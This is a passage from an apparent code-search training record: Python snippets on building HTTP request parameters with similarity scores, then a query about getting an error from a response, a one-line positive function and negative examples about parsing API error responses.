= params\n return request", "def request_vars(self):", "def add_parameters_to_url(path, **kwargs):\n return path + \"?\" + urllib.urlencode(kwargs)", "def parameter_request(\n self, headers: Optional[Mapping[str, str]] = None, **parameters: str\n ) -> requests.Response:\n # Subcall default request method to use ratelimit, etc\n return self.request(\"\", parameters=parameters, headers=headers)", "def addParams(self, *params):\n for param in params:\n self.addParam(param)\n self.params = list(set(self.params))", "def append_to_request(self, request_base, request_object):\n\n pass", "def request_params(self):\n return {'key': self.key, 'hash': self.hash}", "def add_querystring(context, **kwargs):\n\n updated = context['request'].GET.copy()\n\n # have to iterate over and not use .update as it's a QueryDict not a dict\n for k, v in kwargs.items():\n updated[k] = v\n\n return '?{}'.format(updated.urlencode()) if updated else ''", "def inject_post_param(request, injectionstring):\r\n requests = []\r\n return requests", "def _add_query_param(self, route_path, name, type_, default=None):\n route = self._find_route(route_path)\n # logging.info(\"Before:\", route.dependant.query_params)\n query_param = create_query_param(name, type_, default)\n route.dependant.query_params.append(query_param)\n # logging.info(\"After:\", route.dependant.query_params)", "def process_request(self, req, resp, resource, params):", "def _get_method_args(self, method, request, params):\n idx = 0\n\n if method.__servicemethod__['store_arg']:\n params.insert(idx, method.__servicemethod__['store'])\n idx += 1\n\n if method.__servicemethod__['request_arg']:\n params.insert(idx, request)\n\n return params", "def add_param(self, paraminfo):\n self.params[paraminfo.name] = paraminfo", "def set_params(self, **kwargs):\n ...", "def updatekwargs(self,request):\n updated_dict={}\n if isinstance(request.query_params,QueryDict):\n updated_dict = {k:','.join(v) for k,v in request.query_params.iterlists()}\n else:\n updated_dict = request.query_params\n updated_dict.update(self.kwargs)\n\n 
self.kwargs = updated_dict", "def __addAuthParms(self, request_parms):\n ts = str(time.time())\n hashbase = ts+self.conf.getParm(\"private_key\")+self.conf.getParm(\"public_key\")\n hashdigest = hashlib.md5(hashbase.encode('ascii')).hexdigest()\n res = {'ts': ts, 'hash': hashdigest, 'apikey': self.conf.getParm(\"public_key\")}\n for it in request_parms:\n res[it] = request_parms[it]\n return res", "def request_params( self ) -> dict:\n return BaseNetsuiteEtl.BASE_URI_PARAM.copy()", "def _set_parameters(self, *path_params, **query_params):\n\n # take timeout\n try:\n self._timeout = int(query_params.get(\n constants.RequestConst.TIMEOUT, self._timeout\n ))\n except ValueError:\n pass\n try:\n del query_params[constants.RequestConst.TIMEOUT]\n except KeyError:\n pass\n\n # set default API call params\n for key, value in self.default_parameters.items():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n _query_params = self.query_parameters.get_params()\n\n # set API call params defined during the \"call\" invocation\n for key, value in query_params.items():\n if value is None:\n continue\n\n if key in _query_params.values():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n elif key in _query_params.keys():\n self.parameters[\n constants.RequestConst.QUERY\n ][_query_params[key]] = value\n\n if self.method == constants.RequestConst.GET:\n # transform all True and False param to 1 and 0\n for key, value in self.parameters[\n constants.RequestConst.QUERY\n ].items():\n if value is True:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.TRUE\n if value is False:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.FALSE\n\n # set optional url path params\n for value in path_params:\n self.parameters[constants.RequestConst.PATH].append(value)", "def inject_get_param(request, injectionstring):\r\n requests = []\r\n return requests", "def add_parameters(self, path, method, params: set):\n if path not in self.param_infos:\n self.param_infos[path] = {}\n\n method = method.upper()\n if method not in self.param_infos[path]:\n self.param_infos[path][method] = set()\n\n self.param_infos[path][method] |= params", "def _generate_params(self):\n return {\n 'lis_outcome_service_url': self.lis_outcome_service_url,\n 'lis_result_sourcedid': self.lis_result_sourcedid,\n 'oauth_consumer_key': self.key\n }", "def request(self, params=None):\n\t\trequest = APIRequest(self.api)\n\t\tfor attr in APIRequest.attrs:\n\t\t\tval = getattr(self, attr)\n\t\t\t# Copy Mappings (e.g. 
headers)\n\t\t\tval = dict(val) if isinstance(val, collections.abc.Mapping) else val\n\t\t\tsetattr(request, attr, val)\n\t\t# Update GET parameters\n\t\tif params:\n\t\t\trequest.params.update(params)\n\t\treturn request", "def updateParameters(self,*args,**kwargs):\n for key in kwargs.keys():\n self._params[key] = kwargs[key]", "def add_query_param(request, key, val):\n iri = request.get_full_path()\n uri = iri_to_uri(iri)\n return escape(replace_query_param(uri, key, val))", "def set_params(self, params):", "def update_params(self, extra_params):\n self._params.update(extra_params)\n return self", "def update_params(self):\n pass", "def add_parameter():\n argget = utils.create_common_parameter_list()\n add_helpmessage(argget)\n args = argget.parse_args()\n parameter_info = utils.parse_parameter(args)\n parameter_info['encryption'] = args.encryption\n return parameter_info", "def InvocationAddRequest(builder, request):\n return AddRequest(builder, request)", "def __call__(self, request):\n if self.where == \"qs\":\n parts = urlparse(request.url)\n qs = parse_qs(parts.query)\n qs[self.qs_key] = self.token\n request.url = urlunparse(\n (\n parts.scheme,\n parts.netloc,\n parts.path,\n parts.params,\n urlencode(qs),\n parts.fragment,\n )\n )\n elif self.where == \"header\":\n request.headers[\"Authorization\"] = \"Bearer {}\".format(self.token)\n return request", "def __init__(self, request):\n self.arguments = {}\n for k, v in request.GET.items():\n self.arguments.setdefault(k, []).append(v)\n\n self.full_url = lambda: request.url\n self.host = request.host\n self.path = request.path", "def add_param(element):\n nonlocal params\n name = element.attrib.get(\"name\", None)\n value = element.attrib.get(\"value\", \"\")\n if name:\n params[name] = value", "def request(query):", "def modify_query_params(context, **kwargs):\n request = context['request']\n params = request.GET.copy()\n for key, value in kwargs.items():\n if value == '':\n if key in params:\n del params[key]\n else:\n params[key] = value\n return ('?' + params.urlencode()) if params else ''", "def _extend_url(self, url, params):\n # filter out None parameters\n params = {k:v for k,v in params.items() if v is not None}\n for key in params:\n url = url + \"&{}={}\".format(key, params[key])\n return url", "def params(self, **kwargs):\n return kwargs", "def _add_param(self, name):\n param = ParameterInfo()\n param._name = name\n self._parameters.append(param)\n return param", "def _get_query_params(self, req):\n params = {\n 'filters': self._get_filters(req),\n 'limit': self._get_limit(req),\n 'sort_key': [self._get_sort_key(req)],\n 'sort_dir': [self._get_sort_dir(req)],\n 'marker': self._get_marker(req),\n }\n\n for key, value in params.items():\n if value is None:\n del params[key]\n\n return params", "def meta_params(request):\n return request.param", "def build_request_params(title, year, month, day, hour, minute):\n second = 00 # we always use 0 seconds\n headers = {\n 'content-type': 'application/json+protobuf',\n }\n\n id = time.time() # the reminder id is the unix time at which it was created\n reminder_id = 'cli-reminder-' + str(id)\n\n # The structure of the dictionary was extracted from a browser request to\n # create a new reminder. 
I didn't find any official documentation\n # for the request parameters.\n data = {\n \"2\": {\n \"1\": 7\n },\n \"3\": {\n \"2\": reminder_id\n },\n \"4\": {\n \"1\": {\n \"2\": reminder_id\n },\n \"3\": title,\n \"5\": {\n \"1\": year,\n \"2\": month,\n \"3\": day,\n \"4\": {\n \"1\": hour,\n \"2\": minute,\n \"3\": second,\n }\n },\n \"8\": 0\n }\n }\n return headers, data", "def get_params(self, params, name_request):\n self.write('')\n for elem in params:\n request_type = elem['type'] if elem.get('type', None) else 'schema'\n name = elem['name']\n if elem.get('required', None):\n name += '(required)'\n schema = elem.get('schema', None)\n name = f':{name_request} {request_type} {name}:'\n if schema:\n definition = schema['$ref'].split('/')[-1]\n self.write(name + f' :ref:`{definition}`', 1)\n self.write('')\n else:\n desc = elem.get('description', '')\n self.write(name)\n self.write(f'{desc}', self.indent_depth + 1)\n self.write('')", "def updateParameters(self, parameters):", "def set_params(self):\r\n pass", "def request_params(\n self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None\n ) -> MutableMapping[str, Any]:\n return {\"ext_id\": self.ext_id, \"cid\": self.cid}", "def inject(self, request: BaseRequest, args_view: list, kwargs_view: dict):", "def get_query_parameters(self):\n parameters = super().get_query_parameters()\n\n if self.method in ['GET', 'DELETE']:\n self.add_parameters(parameters, [\n self.get_company_id_parameter(),\n self.get_lookup_parameter(),\n ])\n\n return parameters", "def define_parameters(self):", "def params(self):\n if isinstance(self.request, list):\n return unmunchify(self.request)\n (params, _) = xmlrpc.loads(self.request)\n return params", "def set_params(self, **kwargs) -> NoReturn:\n pass", "def construct_params(self):\n\n return {\"expand\": self.get_expand()}", "def add_parameter():\n parameter_info = {}\n argget = utils.create_common_parameter_list(example_string='''\nExample:\n \"python add_event_subscriptions.py -i 10.10.10.10 -u USERID -p PASSW0RD --destination https://10.10.10.11 --eventtypes Alert --context test\"\n''')\n add_helpmessage(argget)\n args = argget.parse_args()\n parameter_info = utils.parse_parameter(args)\n parameter_info[\"destination\"] = args.destination\n parameter_info[\"eventtypes\"] = args.eventtypes\n parameter_info[\"context\"] = args.context\n return parameter_info", "def addParameters(self):\n\n self.pRefArray = self.addParam(\"ikrefarray\", \"string\", \"\")\n self.pUseIndex = self.addParam(\"useIndex\", \"bool\", False)\n\n self.pParentJointIndex = self.addParam(\n \"parentJointIndex\", \"long\", -1, None, None)\n\n self.pJoint = self.addParam(\"joint\", \"bool\", True)", "def _build_request(self, endpoint='', **parameters):\n\n request = {\n 'method': parameters.pop('method', 'GET'),\n 'data': parameters.pop('data', None),\n 'json': parameters.pop('json', None)\n }\n\n # url = {base_url}[/{endpoint}]\n url = '/'.join(filter(None, (self.__class__.base_url, endpoint)))\n\n for index, (key, value) in enumerate(parameters.items()):\n url += '{symbol}{key}={value}'.format(\n symbol='&' if index else '?', key=key, value=value\n )\n\n request['url'] = url\n\n return request", "def get_complete_parameters(self, auth_request_params):\n params = super().get_complete_parameters(auth_request_params)\n params.update(\n {\n \"id_token\": sign_id_token(self.get_apple_id_token_payload()),\n \"user\": json.dumps(\n {\n \"email\": \"[email protected]\",\n 
\"name\": {\n \"firstName\": \"A\",\n \"lastName\": \"B\",\n },\n }\n ),\n }\n )\n return params", "def updated_querystring(request, params):\n original_params = request.GET.copy()\n for key in params:\n if key in original_params:\n original_params.pop(key)\n original_params.update(params)\n return original_params.urlencode()", "def updated_querystring(request, params):\n original_params = request.GET.copy()\n for key in params:\n if key in original_params:\n original_params.pop(key)\n original_params.update(params)\n return original_params.urlencode()", "def _get_query_params(self, req):\n params = {}\n for PARAM in SUPPORTED_PARAMS:\n if req and PARAM in req:\n params[PARAM] = req.get(PARAM)\n\n return params", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(ModifyParametersResponse, self).__init__(*args, **kwds)", "def _inject_params(self, params):\n\n params.extend([LocaleParam(), CompileDomainsParam(),\n UseFuzzyParam(), StatisticsParam(),\n DirectoryParam(), OutputFileParam()])\n\n return super()._inject_params(params)", "def _update_params(self):\n pass", "def _parse_in_request(self, request):\n error = None\n self.logger.debug(\"Http method: %s\" % request.method)\n if request.method == 'GET':\n self._params = request.args.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)\n \n elif request.method == 'POST':\n self._params = request.form.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)", "def Params(req, cmd=None):\n\tif req == 'POST':\n\t\treturn putFunc(\"Params\", cmd)\n\tif req == 'GET':\n\t\treturn getFunc(req, \"Params\")", "def __update_request(self, request_dict, namespace, apikey):\n request_dict['namespace'] = namespace if namespace else self.namespace\n request_dict['apikey'] = apikey if apikey else self.apikey", "def addParam(self, var: IRVariable):\n self.params[var.name] = var", "def set_params(self):\n raise NotImplementedError", "def add_param(self, param):\n self.params.append(param)\n return self", "def _build_update_params(self, params):", "def addParams(self, params, container = None):\n\n\t\tfor param, value in params.iteritems():\n\t\t\tself.addParam([param, value], container)\n\n\t\treturn self", "def set_params(self, *arg):\n pass", "def add_parameters(self, parameters):\n for param in parameters:\n self._queue.put(param)", "def add_http_var(parameter_name, required=True):\n def wrap(func):\n def decorator(request, *args, **kwargs):\n if parameter_name in request.POST:\n kwargs[parameter_name] = request.POST[parameter_name]\n elif parameter_name in request.GET:\n kwargs[parameter_name] = request.GET[parameter_name]\n elif required:\n return HttpResponseBadRequest('Please define GET or POST parameter '+parameter_name)\n else:\n pass\n return func(request, *args, **kwargs)\n return decorator\n return wrap", "def params():\n raise NotImplementedError", "def add_parameters(self, parameters, new_parameters):\n for new in new_parameters:\n if new:\n for parameter in parameters:\n if parameter.name == new.name:\n break\n else:\n parameters.append(new)", "def _set_query_params(query, key, value):\n query.update({str(key): str(value)})", "def gather_params(self):\n for layer in self.layers:\n for name, value in layer.params.iteritems():\n self.params[name] = value", "def prepare_request_params(\n params: {},\n logger,\n url_obj: URL,\n input_fields: list,\n query_params: dict = None,\n):\n if not query_params:\n query_params = {}\n\n headers = get_default_header()\n basic_url = url_obj.get_basic_url()\n\n for field 
in input_fields:\n query_value = params.get(field, \"\")\n\n if field == \"range\" and query_value != \"\":\n check, query_range = validate_query_range(query_value)\n if not check:\n logger.error(query_range)\n logger.info(\"Terminating: Query Range provided is invalid\")\n raise PluginException(cause=INVALID_RANGE_FOUND)\n headers[\"Range\"] = f\"items={query_range}\"\n else:\n if query_value != \"\":\n query_params[field] = query_value\n\n final_queries = []\n for key in query_params:\n final_queries.append(f\"{key}={query_params[key]}\")\n\n if len(final_queries) > 0:\n basic_url = f\"{basic_url}?{'&'.join(final_queries)}\"\n\n return basic_url, headers", "def get_params(self):\n return {\"d\": \"155\"}", "def get_params(self):", "def addParameter(self, name, value):\r\n if not name:\r\n raise InvalidRequest('Parameter name is not a valid.')\r\n\r\n if name in self._parameters:\r\n raise InvalidRequest(\"Can not use the same parameter name '{0}' \"\r\n 'in the same container twice.'.format(name))\r\n\r\n parameter = self._obj.createParameter(name, value)\r\n self._parameters[name] = parameter\r\n parameter.notifyOnDeath(self._parameterDied)", "def add_default_params(self, params):\n params['key'] = self.key\n params['format'] = self.format\n #params['unique_id'] = generate_unique_id()\n return params", "def set_params(self, **kwargs):\n for key, value in kwargs.items():\n if key in self.params.keys():\n self.params[key] = value\n else:\n raise KeyError", "def add_parameter():\n parameter_info = {}\n argget = utils.create_common_parameter_list()\n help_str = \"The Contact person allows you to specify the name and phone number of the person who should be contacted if there is a problem with this system. \"\n argget.add_argument('--contact', type=str,\n help= help_str)\n help_str = \"The Rack Name can be used to help locate the server to a particular rack. \"\n help_str += \"The value is optional and is not configurable in a Flex node. \"\n argget.add_argument('--rack_name', type=str,\n help= help_str)\n help_str = \"The Room No can be used to help locate the server to a room within a data center,\"\n help_str += \"or for multiple data centers at a site. This could also be used to specify the floor or any other large container of racks.\"\n help_str += \" The value is optional and is not configurable in a Flex node.\"\n argget.add_argument('--room_no', type=str,\n help= help_str)\n\n help_str = \"The Building identifies where this system has been installed. \"\n help_str +=\"The information in this parameter, along with Room No, Rack Name and lowest_u position (if provided) allow someone to quickly find the server when necessary for maintenance or other purposes. \"\n help_str +=\"The value is required by SNMPv3 agent service. \"\n argget.add_argument('--building', type=str,\n help= help_str)\n help_str = \"The lowest_u can be used to help locate the server to a position within the rack. 
This value is not configurable in a Flex node.\"\n argget.add_argument('--lowest_u', type=int,\n help= help_str)\n help_str = \"The Address is optional for full postal address.\"\n argget.add_argument('--address', type=str,\n help= help_str)\n args = argget.parse_args()\n parameter_info = utils.parse_parameter(args)\n parameter_info[\"contact\"] = args.contact\n parameter_info[\"rack_name\"] = args.rack_name\n parameter_info[\"room_no\"] = args.room_no\n parameter_info[\"building\"] = args.building\n parameter_info[\"lowest_u\"] = args.lowest_u\n parameter_info[\"address\"] = args.address\n return parameter_info", "def append_event_to_params_dict(self, new_name_and_parameters):\n\n params_dict.update(new_name_and_parameters)", "def setup(self, request_params):\n raise NotImplementedError(\n u\"%s: Method not implemented\", self.__class__.__name__)", "def add_or_replace_parameters(url, new_parameters):\n return _add_or_replace_parameters(url, new_parameters)", "def encode_params(self, base_url, method, params):\n raise NotImplementedError()", "def test_request_parameters(self):\n httpretty.register_uri(httpretty.POST, 'http://somewhere.com/test')\n r = CkanResource('http://somewhere.com/test', None, {'offset': None, 'limit': None, 'carrot': 'cake'})\n s = r._get_response(10, 200)\n self._assert_params_equals(httpretty.last_request().path, {'offset': 2000, 'limit': 200, 'carrot': 'cake'})", "def test_request_params():\n ctxt = SqContextMock('key', 'http', 'rest-ip', 80)\n sqobj = SqObjMock(ctxt, 'default', 'default', 'default',\n 'default', 'default', 'default', 'default')\n engine = SqRestEngine(sqobj)\n # paramters which will override engine internal paramters\n sqobj_override_params = ['hostname', 'namespace', 'view']\n # other parameters\n other_params = ['other_param_0', 'other_param_1']\n\n testing_params = sqobj_override_params + other_params\n # try all combinations of params\n for n_sq_params in range(1, len(testing_params)+1):\n for sq_params in combinations(testing_params, n_sq_params):\n req_params = {p: 'override' for p in sq_params}\n validate_args(engine, req_params)", "def get_params(self):\n pass", "def _build_request_url(self, params, kwargs, post=False):\n if post:\n return '%s?method=%s&type=%s' % (self.endpoint, self.methodname, params.get('type', 'json'))\n else:\n return '%s?%s' % (self.endpoint, kwargs)", "def query_params(self):\n return self.request._request.GET", "def _update_request_uri_query(self, request):\n if \"?\" in request.path:\n request.path, _, query_string = request.path.partition(\"?\")\n if query_string:\n query_params = query_string.split(\"&\")\n for query in query_params:\n if \"=\" in query:\n name, _, value = query.partition(\"=\")\n request.query.append((name, value))\n\n request.path = url_quote(request.path, \"/()$=',\")\n\n # add encoded queries to request.path.\n if request.query:\n request.path += \"?\"\n for name, value in request.query:\n if value is not None:\n request.path += \"{}={}{}\".format(name, url_quote(value, \"/()$=',\"), \"&\")\n request.path = request.path[:-1]\n\n return request.path, request.query", "def add_parameter():\n argget = utils.create_common_parameter_list()\n argget.add_argument('--interfaceid', type=str, default='1', help='Serial interface instance id. (default instance id is 1)')\n argget.add_argument('--bitrate', type=str, default='', help='This property indicates the transmit and receive speed of the serial connection. 
Support: [9600, 19200, 38400, 57600, 115200]')\n argget.add_argument('--stopbits', type=str, default='', help='This property indicates the stop bits for the serial connection. Support:[\"1\",\"2\"].')\n argget.add_argument('--parity', type=str, default='', help='This property indicates parity information for a serial connection. Support: [\"None\", \"Even\", \"Odd\"]')\n argget.add_argument('--enabled', type=str, default='', help='This property indicates if this interface is enabled. Support:(0:false,1:true)')\n args = argget.parse_args()\n parameter_info = utils.parse_parameter(args)\n # Parse the added parameters\n try:\n parameter_info['bitrate'] = args.bitrate\n parameter_info['stopbits'] = args.stopbits\n parameter_info['parity'] = args.parity\n parameter_info['interfaceid'] = args.interfaceid\n parameter_info['enabled'] = args.enabled\n except:\n pass\n return parameter_info" ]
[ "0.74066496", "0.72835517", "0.6995281", "0.6825499", "0.68013364", "0.65432173", "0.6506432", "0.64661425", "0.6460794", "0.63875496", "0.6370902", "0.6263036", "0.62520313", "0.6237418", "0.6223249", "0.61894953", "0.6144124", "0.61332905", "0.6104013", "0.60877264", "0.6074792", "0.6047774", "0.6038013", "0.60356283", "0.6028165", "0.60262614", "0.602559", "0.6015095", "0.5997157", "0.59850043", "0.59678936", "0.59619796", "0.59549206", "0.59529907", "0.59519684", "0.59435844", "0.5925098", "0.59209853", "0.5913908", "0.59111625", "0.5910651", "0.58995014", "0.5897894", "0.5884152", "0.5881049", "0.5870754", "0.5861405", "0.58538646", "0.58519834", "0.583949", "0.58371174", "0.5831244", "0.58280295", "0.58177197", "0.5810609", "0.5808321", "0.57954097", "0.5777409", "0.57752174", "0.57508427", "0.57486343", "0.57425153", "0.57425153", "0.57401544", "0.5739919", "0.5738579", "0.5737497", "0.5732828", "0.57275814", "0.5725329", "0.5713986", "0.5706484", "0.57020414", "0.56952983", "0.5691175", "0.5683238", "0.5681417", "0.56786823", "0.5672793", "0.56696236", "0.56521904", "0.5649366", "0.5645603", "0.5643294", "0.56430775", "0.56320876", "0.56290996", "0.5627637", "0.56269956", "0.5626665", "0.5623292", "0.5620522", "0.56189007", "0.5609653", "0.5608689", "0.5606877", "0.5596294", "0.5584737", "0.5582699", "0.5575852" ]
0.58247703
53
Get error from response.
def get_error_message(self, data, response=None): return str(data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getError(self):\n \n return self.resp[\"error\"]", "def _get_error_message(response):\n try:\n return response.json()[\"detail\"]\n except (KeyError, _JSONDecodeError):\n return response.text", "def error(self):\n error = self._wrapped.error\n if error:\n return error\n\n return self.json['response'].get('error')", "def _extract_error(self, response):\r\n try:\r\n et = ElementTree.parse(response)\r\n error = et.findtext('body/pre')\r\n return error\r\n except ExpatError,e:\r\n return \"%s: %s (%d/%s)\" % (e,response.read(),response.status,response.reason)", "def errorResponse(self):\n return self._errorResponse", "def error(self) -> 'outputs.StatusResponse':\n return pulumi.get(self, \"error\")", "def error_code(self):\n return self.json['response'].get('error_code')", "def error(self):\n return self.get('error')", "def _extract_error(self, resp):\n reason = resp.headers.get(\"reason\", None)\n full_response = None\n\n if reason is None:\n try:\n # if response is in json format\n reason = resp.json()[\"error\"][\"msg\"]\n except KeyError:\n # if json response has unexpected structure\n full_response = resp.content\n except ValueError:\n # otherwise we assume it's html\n reason, full_html = self._scrape_response(resp.headers, resp.content)\n full_response = unescape_html(full_html)\n\n msg = \"[Reason: %s]\" % reason\n\n if reason is None:\n msg += \"\\n%s\" % full_response\n\n return msg", "def parse_response(self, response, **kw):\n data = super().parse_response(response, **kw)\n error = data.get('error')\n if error is None:\n return data['result']\n else:\n # assume error object follows json-rpc 2.0 spec formatting\n self.handle_error(code=error['code'], msg=error['message'])", "def _get_error_message_from_httperror(err):\n json_error = json.loads(str(err.content.decode()))\n return json_error.get('error', {}).get('message', '')", "def __get_response_error(message, response):\n\n rjson = response.json()\n error_description = \"Code %s - %s\" %(str(response.status_code), rjson.get('message'))\n\n return {\n 'app_message': \"%s\" % (message),\n 'error_description': \"[%s] - %s\" % (message, error_description),\n 'code': response.status_code\n }", "def error(self):\n return self['error']", "def get_errors(response):\n errors = response.get(\"error\")\n if errors:\n return [e.get(\"message\") for e in errors]\n return None", "def error(self, http_error):\n return HTTPResponse(str(http_error), status=http_error.status)", "def handle_error_response(resp):\n error_message = ''\n error_message_with_reason = ''\n try:\n error_message = (\n resp.json()\n .get('fireeyeapis', {})\n .get('description', '')\n .strip()\n )\n error_message = error_message.replace('\\n', '')\n if error_message:\n error_message_with_reason = f'Reason: {error_message}'\n except ValueError: # ignoring json parsing errors\n pass\n if resp.headers.get('Content-Type', '') == CONTENT_TYPE_ZIP:\n error_message = error_message_with_reason = resp.text\n\n status_code_messages = {\n 400: f\"{MESSAGES['BAD_REQUEST_ERROR']} {error_message_with_reason}\",\n 401: MESSAGES['AUTHENTICATION_ERROR'],\n 403: error_message,\n 404: error_message,\n 406: error_message,\n 407: MESSAGES['PROXY_ERROR'],\n 500: MESSAGES['INTERNAL_SERVER_ERROR'],\n 503: MESSAGES['INTERNAL_SERVER_ERROR'],\n }\n\n if resp.status_code in status_code_messages:\n demisto.debug(\n f'Response Code: {resp.status_code}, Reason: {status_code_messages[resp.status_code]}'\n )\n raise DemistoException(status_code_messages[resp.status_code])\n else:\n raise 
DemistoException(resp.raise_for_status())", "def validate_response(response):\n\n r = response\n try:\n r.raise_for_status()\n except HTTPError as e:\n message = dict(status_code=r.status_code, exception=e)\n\n try:\n response = r.json()\n message['response'] = response\n except JSONDecodeError as e:\n message['response'] = r.content\n\n raise HTTPError(message)", "def handle_error_response(response_body):\n try:\n error_components = []\n error_data = json.loads(response_body)\n\n error_components.append(\"Error code {}\".format(error_data[\"error\"]))\n if \"error_description\" in error_data:\n error_components.append(\": {}\".format(error_data[\"error_description\"]))\n if \"error_uri\" in error_data:\n error_components.append(\" - {}\".format(error_data[\"error_uri\"]))\n error_details = \"\".join(error_components)\n # If no details could be extracted, use the response data.\n except (KeyError, ValueError):\n error_details = response_body\n\n raise exceptions.OAuthError(error_details, response_body)", "def get_error(self):\n return self.e", "def handle_errors(resp: requests.Response):\n error_text = resp.text\n if isinstance(resp.text, bytes):\n try:\n error_text = error_text.decode(UTF_ENCODING)\n except UnicodeDecodeError:\n error_text = error_text.decode(\"iso-8859-1\")\n if error_text != \"\":\n _raise_error(error_text)\n resp.raise_for_status()", "def _err_response(self, msg):\r\n return {'success': False, 'error': msg}", "def _parse_store_error(self, response):\n default_msg = \"Failure working with the Store: [{}] {!r}\".format(\n response.status_code, response.content\n )\n try:\n error_data = response.json()\n except ValueError:\n return default_msg\n\n try:\n error_info = [(error[\"message\"], error[\"code\"]) for error in error_data[\"error-list\"]]\n except (KeyError, TypeError):\n return default_msg\n\n if not error_info:\n return default_msg\n\n messages = []\n for msg, code in error_info:\n if code:\n msg += \" [code: {}]\".format(code)\n messages.append(msg)\n return \"Store failure! 
\" + \"; \".join(messages)", "def callback(response):\n error_msg = None\n if response.status_code >= 300 and response.status_code < 500:\n resp = response.json()\n if response.status_code == 401 and resp.get(\"message\") == \"Authentication Error\":\n raise AuthenticationError()\n\n msg = resp.get('messages') or resp.get('message')\n details = resp.get('details')\n error_msg = u\"ReaQta Error: \\n status code: {0}\\n message: {1}\\n details: {2}\".format(\n response.status_code,\n msg,\n details)\n\n return response, error_msg", "def get_error(self):\n return self.exc_info", "def error(self):\n retval = self.resource.error()\n if not retval and self._exception:\n retval = _Error(\n self._exception.code,\n str(self._exception),\n None)\n return retval", "def response_error(error, status=400):\n\n response = {\n 'status': 'failed',\n 'error': error\n }\n\n return response_json(response, status=400)", "def return_request_error(error_message: str, http_status_code: int, response: Response):\n response.status_code = http_status_code\n return {\n 'error': error_message\n }", "def response_error(response):\n if response.headers.get('X-RateLimit-Remaining') is not None:\n if int(response.headers['X-RateLimit-Remaining']) == 0:\n sys.stderr.write('Error: Rate Limit Reached, will reset in ' + response.headers.get(\n 'X-RateLimit-Reset') + ' seconds \\n')\n return True\n try:\n response.raise_for_status()\n except requests.exceptions.HTTPError as error:\n sys.stderr.write(\"\\nRequest Error:\\t %s\" % error.message)\n try:\n sys.stderr.write(\"\\nError code:\\t %s\" % response.json()['errorCode'])\n sys.stderr.write(\"\\nError message:\\t %s \" % response.json()['message'])\n except (ValueError, KeyError):\n pass\n\n if response.status_code == 500:\n sys.stderr.write('Your account may have no owner assigned. '\n 'Please visit www.logentries.com for information on '\n 'assigning an account owner. \\n')\n return True\n\n if response.status_code == 200:\n if response.headers['Content-Type'] != 'application/json':\n sys.stderr.write('Unexpected Content Type Received in Response: ' + response.headers[\n 'Content-Type'])\n return True\n else:\n return False\n return False", "def error(self):\n return self._error", "def error(self):\n return self._error", "def error(self):\n return self._error", "def read_tapis_http_error(http_error_object):\n h = http_error_object\n # extract HTTP response code\n code = -1\n try:\n code = h.response.status_code\n assert isinstance(code, int)\n except Exception:\n # we have no idea what happened\n code = 418\n\n # extract HTTP reason\n reason = 'UNKNOWN ERROR'\n try:\n reason = h.response.reason\n except Exception:\n pass\n\n # Tapis APIs will give JSON responses if the target web service is at all\n # capable of fulfilling the request. 
Therefore, try first to extract fields\n # from the JSON response, then fall back to returning the plain text from\n # the response.\n err_msg = 'Unexpected encountered by the web service'\n status_msg = 'error'\n version_msg = 'unknown'\n try:\n j = h.response.json()\n if 'message' in j:\n err_msg = j['message']\n if 'status' in j:\n status_msg = j['status']\n if 'version' in j:\n version_msg = j['version']\n except Exception:\n err_msg = h.response.text\n\n httperror = '[{}] {}; message: {}; status: {}; version: {}; response.content: {}'\n return httperror.format(code, reason, err_msg, status_msg, version_msg,\n h.response.content)", "def validate_response(response: json):\n if \"error\" in response:\n print(\"ERROR: Request returned error\")\n print_request_response(response)\n exit(1)", "def get_alexa_error(data: dict) -> Union[str, None]:\n if \"request\" in data and \"err\" in data[\"request\"] and \"message\" in data[\"request\"][\"err\"]:\n return data[\"request\"][\"err\"][\"message\"]\n else:\n return None", "def error(self):\n errors = self._info.get('error', {}).get('errors')\n if not errors:\n return None\n return ' '.join(err.get('message', 'unknown') for err in errors)", "def error_response(error_text):\n return Response(json.dumps({'error' : error_text}), status=404, mimetype='application/json')", "def auth_error(error):\n return jsonify(error.error), error.status_code", "def _create_error_response(self, error):\n status = error.status\n try:\n body = json.loads(error.body)\n except Exception:\n body = {}\n if status in [403, 429]:\n # Parse differently if the error message came from kong\n errors = [ApiError(None, body.get(Responses.message, None))]\n else:\n errors = [ApiError(err.get(Responses.context, None),\n err.get(Responses.message, None))\n for err in body.get(Responses.errors, {})]\n return ErrorResponse(status, errors, headers=error.headers)", "def evaluate_response(response):\n if isinstance(response, Exception):\n raise type(response)(response)\n else:\n if response.status_code == 401:\n raise MyExceptions.WrongCredentials(\n 'The RPC credentials in the ' +\n 'settings.py file are incorrect\\n' +\n 'Fix it and try again'\n )\n try:\n error = response.json()['error']\n except (ValueError, KeyError):\n try:\n return response.json()['result']\n except (ValueError, KeyError):\n return\n else:\n raise MyExceptions.RpcError(error['message'])", "def parsed_error_msg(self):\r\n return self.error_msg", "def get_error_response():\n response = HTTPResponse.HTTPResponse(version=1.0, status_code=500,\n phrase=\"Internal Error\")\n headers = HTTPHeaders.HTTPHeaders()\n add_default_headers(headers)\n headers[\"Content-Length\"] = str(0)\n headers[\"Connection\"] = \"close\"\n response.set_headers(headers)\n\n return response.build_response()", "def parse_response(self, response):\n data = json_decode(response)\n\n if data['stat'] == 'error':\n self.logger.debug(\"Response:\\n\" + json_encode(data, indent=4))\n try:\n message = data['error_description']\n except KeyError:\n message = data['message']\n raise ApiResponseError(data['code'], data['error'], message, data)\n return data", "def parse_response(self, response):\n try:\n response = json.loads(response)\n if 'error' in response:\n if 'message' in response['error']:\n raise self.CMoreError(response['error']['message'])\n elif 'description' in response['error']:\n raise self.CMoreError(response['error']['description'])\n elif 'code' in response['error']:\n raise self.CMoreError(response['error']['error'])\n\n except 
